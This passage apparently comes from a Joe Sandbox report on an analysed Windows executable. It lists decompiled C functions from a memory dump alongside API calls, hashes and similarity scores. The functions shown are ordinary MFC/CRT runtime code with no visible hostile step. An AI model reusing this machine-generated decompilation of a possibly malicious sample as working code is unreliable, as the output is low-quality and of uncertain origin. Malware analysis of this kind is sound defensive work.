                  0x0041e691
                  0x0041e69d
                  0x0041e69d
                  0x0041e6a4
                  0x0041e6ff
                  0x00000000
                  0x0041e702
                  0x0041e6a6
                  0x0041e6a9
                  0x0041e6ac
                  0x0041e6b3
                  0x0041e6bd
                  0x0041e6bf
                  0x00000000
                  0x00000000
                  0x0041e6c8
                  0x0041e6cd
                  0x0041e6cf
                  0x00000000
                  0x00000000
                  0x0041e6d6
                  0x0041e6dc
                  0x0041e6de
                  0x0041e6eb
                  0x0041e6f7
                  0x00000000
                  0x0041e6f7
                  0x0041e6e1
                  0x0041e6e7
                  0x0041e6e9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041e6e9
                  0x0041e6ae
                  0x0041e6b1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041e6b1
                  0x0041e693
                  0x0041e697
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041e699
                  0x0041e683
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID: Edit
                  • API String ID: 0-554135844
                  • Opcode ID: c1eaeca9360dd2e0f6646002c445170fec6f5d61c69e99854a4b31f63b5ac5b7
                  • Instruction ID: b5ab8b2baa659c6befb1724199395fd29165e35119e0420f22d42a720b62807e
                  • Opcode Fuzzy Hash: c1eaeca9360dd2e0f6646002c445170fec6f5d61c69e99854a4b31f63b5ac5b7
                  • Instruction Fuzzy Hash: F1118239340212ABEA2026279C09B9BB669AF61754FD00537FD41E61E1CFACD8E1C55D
                  Uniqueness

                  Uniqueness Score: 6.84%

                  Function 0042CE03, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42UNIQUELIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 28%
                  			E0042CE03(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0042CD71(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00427A52(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0042C7EE(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E0042CA56(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E00427A19(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                  0x0042ce03
                  0x0042ce03
                  0x0042ce03
                  0x0042ce03
                  0x0042ce03
                  0x0042ce08
                  0x0042ce0c
                  0x0042ce0e
                  0x0042ce11
                  0x0042ce12
                  0x0042ce13
                  0x0042ce16
                  0x0042ce1b
                  0x0042ce1b
                  0x0042ce1e
                  0x0042ce22
                  0x0042ce25
                  0x0042ce2a
                  0x0042ce27
                  0x0042ce27
                  0x0042ce27
                  0x0042ce2d
                  0x0042ce32
                  0x0042ce34
                  0x0042ce37
                  0x0042ce3a
                  0x0042ce3b
                  0x0042ce43
                  0x0042ce48
                  0x0042ce4c
                  0x0042ce4f
                  0x0042ce52
                  0x0042ce58
                  0x0042ce59
                  0x0042ce5c
                  0x0042ce66
                  0x0042ce6a
                  0x00000000
                  0x0042ce6a
                  0x0042ce70

                  APIs
                  • ___BuildCatchObject.LIBCMT ref: 0042CE16
                    • Part of subcall function 0042CD71: ___BuildCatchObjectHelper.LIBCMT ref: 0042CDA7
                  • _UnwindNestedFrames.LIBCMT ref: 0042CE2D
                  • ___FrameUnwindToState.LIBCMT ref: 0042CE3B
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                  • String ID: csm$l}D
                  • API String ID: 2163707966-671395483
                  • Opcode ID: 11c63b8505b0a9d1028eb40c4b72c4472e59987acd9840c730c7ee8513159caa
                  • Instruction ID: 97ba0c25cf88d2267801a78c478078dec4f43481847f31abb851874b044a3a44
                  • Opcode Fuzzy Hash: 11c63b8505b0a9d1028eb40c4b72c4472e59987acd9840c730c7ee8513159caa
                  • Instruction Fuzzy Hash: 64014B71100129BBDF12AF51EC85EAF7F6AFF08394F81401ABD0815121D73A9971EBA9
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004140C2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E004140C2(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}







                  0x004140ce
                  0x004140d0
                  0x004140dc
                  0x004140de
                  0x004140e6
                  0x004140f7
                  0x004140fb
                  0x004140fe
                  0x004140fe
                  0x004140e8
                  0x004140f0
                  0x004140f0
                  0x00414109

                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 004140D0
                  • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 004140DE
                  • SetLastError.KERNEL32(00000078), ref: 004140FE
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$SetLayout
                  • API String ID: 4275029093-2147214759
                  • Opcode ID: 9b8d473c49fd3d84b58b9c99d83dfb1e7220dbfadac609eefbe553beeae09c5b
                  • Instruction ID: 8a1877a12cc709a5d7521cbc8d40f6a619cdb90c90200ff629e2cffd0f3fbba5
                  • Opcode Fuzzy Hash: 9b8d473c49fd3d84b58b9c99d83dfb1e7220dbfadac609eefbe553beeae09c5b
                  • Instruction Fuzzy Hash: 78E0223328020077C3204B5AAC48D9B7F16D7D87717294232F669C22A0CB7A8891876A
                  Uniqueness

                  Uniqueness Score: 1.44%

                  Function 0042C7A5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E0042C7A5(void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;
				void* _t25;

				_t26 = __esi;
				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E0042C35A(_t23, __edx, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E0042C35A(_t23, __edx, _t25, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E0042C35A(_t23, __edx, _t25, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x447da8);
						E00429338(_t23, _t25, __esi);
						_t19 =  *((intOrPtr*)(E0042C35A(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E0042937D(E0043146A(_t23, _t24, _t25, _t26));
					}
				}
			}









                  0x0042c7a5
                  0x0042c7a5
                  0x0042c7af
                  0x0042c7b6
                  0x0042c7d5
                  0x0042c7dc
                  0x0042c7e3
                  0x0042c7e8
                  0x0042c7e8
                  0x0042c7e8
                  0x00000000
                  0x0042c7b8
                  0x0042c7b8
                  0x0042c7bd
                  0x0042c7ea
                  0x0042c7ea
                  0x0042c7ed
                  0x0042c7bf
                  0x0042c7c4
                  0x0042d3af
                  0x0042d3b1
                  0x0042d3b6
                  0x0042d3c0
                  0x0042d3c5
                  0x0042d3c7
                  0x0042d3cb
                  0x0042d3d6
                  0x0042d3d6
                  0x0042d3e7
                  0x0042d3e7
                  0x0042c7bd

                  APIs
                  • __getptd.LIBCMT ref: 0042C7BF
                    • Part of subcall function 0042C35A: __getptd_noexit.LIBCMT ref: 0042C35D
                    • Part of subcall function 0042C35A: __amsg_exit.LIBCMT ref: 0042C36A
                  • __getptd.LIBCMT ref: 0042C7D0
                  • __getptd.LIBCMT ref: 0042C7DE
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: MOC$csm
                  • API String ID: 803148776-1389381023
                  • Opcode ID: e68d7cd1e198b97307a70fb647dc714a812b58e3fc1a01e9a224ec87df6449d8
                  • Instruction ID: fcad132b85fcf5cb73d165f3e6deaf37bb2e77d3f6ffe6503b81c680af6763ec
                  • Opcode Fuzzy Hash: e68d7cd1e198b97307a70fb647dc714a812b58e3fc1a01e9a224ec87df6449d8
                  • Instruction Fuzzy Hash: 5AE01232740114CFC710E665E08572D3795AB88354F994997E809C7312D72CE8449986
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0041408A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0041408A(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}






                  0x00414092
                  0x004140a0
                  0x004140a8
                  0x004140b5
                  0x004140b8
                  0x004140aa
                  0x004140af
                  0x004140af
                  0x004140c1

                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL,?,004252AE), ref: 00414094
                  • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 004140A0
                  • SetLastError.KERNEL32(00000078), ref: 004140B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$GetLayout
                  • API String ID: 4275029093-2396518106
                  • Opcode ID: 84f47a06b23efee7638f15aa58e6b9f7435459d0723091dd8cd37d9d6e48611b
                  • Instruction ID: 9c48f639d147d7f876a1e740b46ecd304c219b4bcf680c8c785379c536c5c6a6
                  • Opcode Fuzzy Hash: 84f47a06b23efee7638f15aa58e6b9f7435459d0723091dd8cd37d9d6e48611b
                  • Instruction Fuzzy Hash: A4D0C23268532067D67027627D0CA432F849B887B171916617DA5D22E0CBA9CC40869E
                  Uniqueness

                  Uniqueness Score: 1.51%

                  Function 00424551, Relevance: 7.6, APIs: 5, Instructions: 100keyboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00424551(void* __ecx, void* __eflags, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				void* __ebx;
				void* __edi;
				signed int _t44;
				signed int _t48;
				signed int _t52;
				signed int _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;
				void* _t80;

				_t80 = __eflags;
				_t75 = __ecx;
				_v8 = E00411D59(__ecx);
				GetWindowRect( *(__ecx + 0x20),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E0040E168(_t67, _t75, _t75, _t80);
				if((_v8 & 0x00001000) == 0) {
					L5:
					__eflags = _t76 - 0xa;
					if(_t76 < 0xa) {
						L7:
						__eflags = _t76 - 4;
						if(_t76 != 4) {
							L16:
							return _t76;
						}
						L8:
						__eflags = _v8 & 0x00000800;
						if((_v8 & 0x00000800) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							__eflags = _v8 & 0x00000200;
							if((_v8 & 0x00000200) == 0) {
								goto L16;
							}
							_t44 = _t76 - 4;
							__eflags = _t44;
							if(_t44 == 0) {
								L21:
								__eflags = _a8 - _v24.bottom;
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							__eflags = _t48;
							if(_t48 == 0) {
								__eflags = _a8 - _v24.top;
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							__eflags = _t52;
							if(_t52 == 0) {
								__eflags = _a8 - _v24.top;
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							__eflags = _t57;
							if(_t57 == 0) {
								__eflags = _a8 - _v24.bottom;
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							__eflags = _t57 == 1;
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
					__eflags = _t76 - 0x11;
					if(_t76 <= 0x11) {
						goto L8;
					}
					goto L7;
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}

















                  0x00424551
                  0x0042455c
                  0x00424563
                  0x0042456d
                  0x0042457f
                  0x00424585
                  0x00424593
                  0x00424595
                  0x004245b0
                  0x004245b0
                  0x004245b3
                  0x004245ba
                  0x004245ba
                  0x004245bd
                  0x004245fc
                  0x00000000
                  0x004245fc
                  0x004245bf
                  0x004245bf
                  0x004245c6
                  0x004245d7
                  0x004245dd
                  0x004245e4
                  0x00000000
                  0x00000000
                  0x004245e8
                  0x004245e8
                  0x004245eb
                  0x0042463a
                  0x0042463f
                  0x00000000
                  0x00424645
                  0x004245ed
                  0x004245ed
                  0x004245f0
                  0x0042462e
                  0x00000000
                  0x00424634
                  0x004245f2
                  0x004245f2
                  0x004245f3
                  0x0042461e
                  0x00000000
                  0x00424624
                  0x004245f6
                  0x004245f6
                  0x004245f7
                  0x0042460a
                  0x00000000
                  0x00424614
                  0x004245f9
                  0x004245fa
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004245fa
                  0x004245ca
                  0x00000000
                  0x004245ca
                  0x004245b5
                  0x004245b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004245b8
                  0x0042459a
                  0x0042459e
                  0x0042459e
                  0x004245aa
                  0x00000000
                  0x004245ac
                  0x00000000
                  0x004245ac

                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • GetWindowRect.USER32(?,?), ref: 0042456D
                  • GetSystemMetrics.USER32(00000021), ref: 0042457B
                  • GetSystemMetrics.USER32(00000020), ref: 00424581
                  • GetKeyState.USER32(00000002), ref: 004245A1
                  • InflateRect.USER32(?,00000000,00000000), ref: 004245D7
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MetricsRectSystemWindow$InflateLongState
                  • String ID:
                  • API String ID: 2406722796-0
                  • Opcode ID: ca3daba9ae1a4b918d923478c38b4788f41cffe7335a79f934fba51ee3e13cd1
                  • Instruction ID: 8ad1fee93d3276f89ab2700491bb55a06857219860de39e348c3690f2fea8962
                  • Opcode Fuzzy Hash: ca3daba9ae1a4b918d923478c38b4788f41cffe7335a79f934fba51ee3e13cd1
                  • Instruction Fuzzy Hash: CA312932700138BBDB20CBA8E94DAAF77A4EFC5354F854027E146D7290D6BCCD81C669
                  Uniqueness

                  Uniqueness Score: 1.59%

                  Function 0040EF17, Relevance: 7.6, APIs: 5, Instructions: 80windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0040EF17(signed int __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				struct HWND__* _t29;
				signed int _t32;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t53;
				void* _t54;
				void* _t55;

				_t55 = __eflags;
				_t42 = __ebx;
				_push(0x80);
				E0042922B(E004389B9, __ebx, __edi, __esi);
				 *(_t54 - 0x10) = __ecx;
				E0041187F(_t54 - 0x38);
				_t45 = _t54 - 0x8c;
				E0040CD71(_t54 - 0x8c, _t55);
				 *(_t54 - 4) = 0;
				_t29 = GetTopWindow( *(__ecx + 0x20));
				while(1) {
					_t53 = _t29;
					if(_t53 == 0) {
						break;
					}
					 *(_t54 - 0x6c) = _t53;
					 *((intOrPtr*)(_t54 - 0x34)) = GetDlgCtrlID(_t53);
					 *((intOrPtr*)(_t54 - 0x24)) = _t54 - 0x8c;
					_t32 = E0040E23A(_t42, _t45, 0, _t53, __eflags, _t53);
					__eflags = _t32;
					if(_t32 == 0) {
						L3:
						_t45 =  *(_t54 - 0x10);
						__eflags = E00411700( *(_t54 - 0x10), 0, _t53,  *((intOrPtr*)(_t54 - 0x34)), 0xffffffff, _t54 - 0x38, 0);
						if(__eflags == 0) {
							_t42 =  *(_t54 + 0xc);
							__eflags = _t42;
							if(_t42 != 0) {
								_t36 = SendMessageW( *(_t54 - 0x6c), 0x87, 0, 0);
								__eflags = _t36 & 0x00002000;
								if((_t36 & 0x00002000) == 0) {
									L10:
									_t42 = 0;
									__eflags = 0;
								} else {
									_t38 = E00411D59(_t54 - 0x8c) & 0x0000000f;
									__eflags = _t38 - 3;
									if(_t38 == 3) {
										goto L10;
									} else {
										__eflags = _t38 - 6;
										if(_t38 == 6) {
											goto L10;
										} else {
											__eflags = _t38 - 7;
											if(_t38 == 7) {
												goto L10;
											} else {
												__eflags = _t38 - 9;
												if(_t38 == 9) {
													goto L10;
												}
											}
										}
									}
								}
							}
							_t45 = _t54 - 0x38;
							E004118A5(_t54 - 0x38,  *((intOrPtr*)(_t54 + 8)), _t42);
						}
					} else {
						_t45 = _t32;
						__eflags = E00411700(_t32, 0, _t53, 0, 0xbd11ffff, _t54 - 0x38, 0);
						if(__eflags == 0) {
							goto L3;
						}
					}
					_t29 = GetWindow(_t53, 2);
				}
				_t21 = _t54 - 4;
				 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
				 *(_t54 - 0x6c) = 0;
				return E00429303(E0040EBF1(_t42, _t54 - 0x8c, 0, _t53,  *_t21));
			}










                  0x0040ef17
                  0x0040ef17
                  0x0040ef17
                  0x0040ef21
                  0x0040ef28
                  0x0040ef2e
                  0x0040ef33
                  0x0040ef39
                  0x0040ef43
                  0x0040ef46
                  0x0040eff4
                  0x0040eff4
                  0x0040eff8
                  0x00000000
                  0x00000000
                  0x0040ef52
                  0x0040ef5b
                  0x0040ef65
                  0x0040ef68
                  0x0040ef6d
                  0x0040ef6f
                  0x0040ef87
                  0x0040ef87
                  0x0040ef99
                  0x0040ef9b
                  0x0040ef9d
                  0x0040efa0
                  0x0040efa2
                  0x0040efae
                  0x0040efb4
                  0x0040efb9
                  0x0040efdd
                  0x0040efdd
                  0x0040efdd
                  0x0040efbb
                  0x0040efc6
                  0x0040efc9
                  0x0040efcc
                  0x00000000
                  0x0040efce
                  0x0040efce
                  0x0040efd1
                  0x00000000
                  0x0040efd3
                  0x0040efd3
                  0x0040efd6
                  0x00000000
                  0x0040efd8
                  0x0040efd8
                  0x0040efdb
                  0x00000000
                  0x00000000
                  0x0040efdb
                  0x0040efd6
                  0x0040efd1
                  0x0040efcc
                  0x0040efb9
                  0x0040efe3
                  0x0040efe6
                  0x0040efe6
                  0x0040ef71
                  0x0040ef7c
                  0x0040ef83
                  0x0040ef85
                  0x00000000
                  0x00000000
                  0x0040ef85
                  0x0040efee
                  0x0040efee
                  0x0040effe
                  0x0040effe
                  0x0040f008
                  0x0040f015

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040EF21
                  • GetTopWindow.USER32(?), ref: 0040EF46
                  • GetDlgCtrlID.USER32(00000000), ref: 0040EF55
                  • SendMessageW.USER32(00000087,00000087,00000000,00000000), ref: 0040EFAE
                  • GetWindow.USER32(00000000,00000002), ref: 0040EFEE
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$CtrlH_prolog3MessageSend
                  • String ID:
                  • API String ID: 849854284-0
                  • Opcode ID: 0a795099d67d4c8b7fb90eb729637051ed253cc4281b446870ccc4f83d384e72
                  • Instruction ID: 23955d3deb9ab69ed9e018f6d661c27fe23f5ecedeeefac865633031ef26d70c
                  • Opcode Fuzzy Hash: 0a795099d67d4c8b7fb90eb729637051ed253cc4281b446870ccc4f83d384e72
                  • Instruction Fuzzy Hash: E621D531900115BBCB21ABA2DC84EEEBA79AF51314F10463BF451F22E1EB788D50CB19
                  Uniqueness

                  Uniqueness Score: 0.90%

                  Function 00416080, Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E00416080(void* __ecx, unsigned int _a4) {
				void* __ebp;
				struct HWND__* _t20;
				void* _t23;
				void* _t27;
				void* _t34;
				struct HWND__* _t35;

				_t28 = __ecx;
				_t34 = __ecx;
				if((E00411D59(__ecx) & 0x40000000) == 0) {
					_t28 = __ecx;
					_t27 = E0040ED5B(__ecx);
				} else {
					_t27 = __ecx;
				}
				if(_t27 == 0) {
					E00413DD0(_t28);
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E00411E53(_t27);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t27 == _t34) {
						SendMessageW( *(_t27 + 0x20), 0x86, 0, 0);
					} else {
						 *(_t34 + 0x3c) =  *(_t34 + 0x3c) | 0x00000200;
						SendMessageW( *(_t27 + 0x20), 0x86, 1, 0);
						 *(_t34 + 0x3c) =  *(_t34 + 0x3c) & 0xfffffdff;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t35 = _t20;
					if(_t35 == 0) {
						break;
					}
					if(E004156A7( *(_t27 + 0x20), _t35) != 0) {
						SendMessageW(_t35, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t35);
				}
				return _t20;
			}









                  0x00416080
                  0x00416088
                  0x00416094
                  0x0041609a
                  0x004160a1
                  0x00416096
                  0x00416096
                  0x00416096
                  0x004160a5
                  0x004160a7
                  0x004160a7
                  0x004160b6
                  0x004160ba
                  0x004160ca
                  0x004160fe
                  0x004160d4
                  0x004160d4
                  0x004160e7
                  0x004160e9
                  0x004160e9
                  0x004160ca
                  0x00416100
                  0x00416108
                  0x00416128
                  0x00416128
                  0x0041612e
                  0x00416132
                  0x00000000
                  0x00000000
                  0x00416116
                  0x00416123
                  0x00416123
                  0x00416125
                  0x00416127
                  0x00416127
                  0x00416138

                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 004160E7
                  • SendMessageW.USER32(?,00000086,00000000,00000000), ref: 004160FE
                  • GetDesktopWindow.USER32 ref: 00416102
                  • SendMessageW.USER32(00000000,0000036D,0000000C,00000000), ref: 00416123
                  • GetWindow.USER32(00000000), ref: 00416128
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSendWindow$DesktopLong
                  • String ID:
                  • API String ID: 2272707703-0
                  • Opcode ID: 23fe42bd3d8f3eba715d88e7df0d1a97e5c6a75ef240f5eaa96edcbcaf8a8129
                  • Instruction ID: c83a090748aa953fd499e661a2ba550c24a20b093e05f380a44fd785bca14097
                  • Opcode Fuzzy Hash: 23fe42bd3d8f3eba715d88e7df0d1a97e5c6a75ef240f5eaa96edcbcaf8a8129
                  • Instruction Fuzzy Hash: 3711E73134071577EB316B528C46FEB3E58AF88750F22412EFE46591E2CAEDDC818A9D
                  Uniqueness

                  Uniqueness Score: 0.63%

                  Function 004167E7, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E004167E7(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags, struct HWND__* _a4, unsigned int _a8) {
				signed int _v8;
				short _v528;
				struct HWND__* _v532;
				intOrPtr _v536;
				void* __esi;
				void* __ebp;
				signed int _t22;
				int _t28;
				unsigned int _t48;
				void* _t51;
				void* _t54;
				intOrPtr _t55;
				void* _t56;
				signed int _t60;

				_t52 = __edi;
				_t51 = __edx;
				_t42 = __ebx;
				_t58 = _t60;
				_t22 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t22 ^ _t60;
				_push(_t54);
				_v536 = __ecx;
				_v532 = _a4;
